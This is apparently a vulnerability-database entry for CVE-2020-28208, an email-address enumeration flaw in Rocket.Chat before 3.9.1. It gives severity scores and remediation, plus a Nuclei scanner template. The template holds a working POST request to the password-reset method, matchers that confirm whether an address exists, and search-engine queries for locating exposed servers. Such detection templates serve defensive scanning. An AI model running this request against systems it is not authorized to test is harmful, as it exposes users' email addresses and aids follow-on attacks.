Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-28208
HistoryMar 29, 2021 - 11:39 a.m.

Rocket.Chat <3.9.1 - Information Disclosure

2021-03-2911:39:45
ProjectDiscovery
github.com
2

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.3 Medium

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.3%

Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.

id: CVE-2020-28208

info:
  name: Rocket.Chat <3.9.1 - Information Disclosure
  author: pdteam
  severity: medium
  description: Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    The vulnerability can lead to the exposure of sensitive information, such as user credentials or private conversations, potentially compromising the confidentiality of the system.
  remediation: |
    Upgrade Rocket.Chat to version 3.9.1 or later to mitigate the information disclosure vulnerability (CVE-2020-28208).
  reference:
    - https://trovent.io/security-advisory-2010-01
    - https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt
    - http://www.openwall.com/lists/oss-security/2021/01/07/1
    - http://packetstormsecurity.com/files/160845/Rocket.Chat-3.7.1-Email-Address-Enumeration.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28208
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-28208
    cwe-id: CWE-203
    epss-score: 0.01197
    epss-percentile: 0.84869
    cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rocket.chat
    product: rocket.chat
    shodan-query: http.title:"rocket.chat"
    fofa-query: title="rocket.chat"
    google-query: intitle:"rocket.chat"
  tags: cve,cve2020,packetstorm,rocketchat,rocket.chat

http:
  - raw:
      - |
        POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/json

        {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"[email protected]\"],\"id\":\"3\"}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result\":false'
          - '"success":true'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d6c7f2a1023bb8cf377fabfbbb4829f00d2a7a324a1f4559b5194b1efd41728d022061a65ea3ea14cd681975c01cb9ef4b911f1cc14e8257bf2298322a46ac77766f:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

5.3 Medium

AI Score

Confidence

High

0.012 Low

EPSS

Percentile

85.3%

Related for NUCLEI:CVE-2020-28208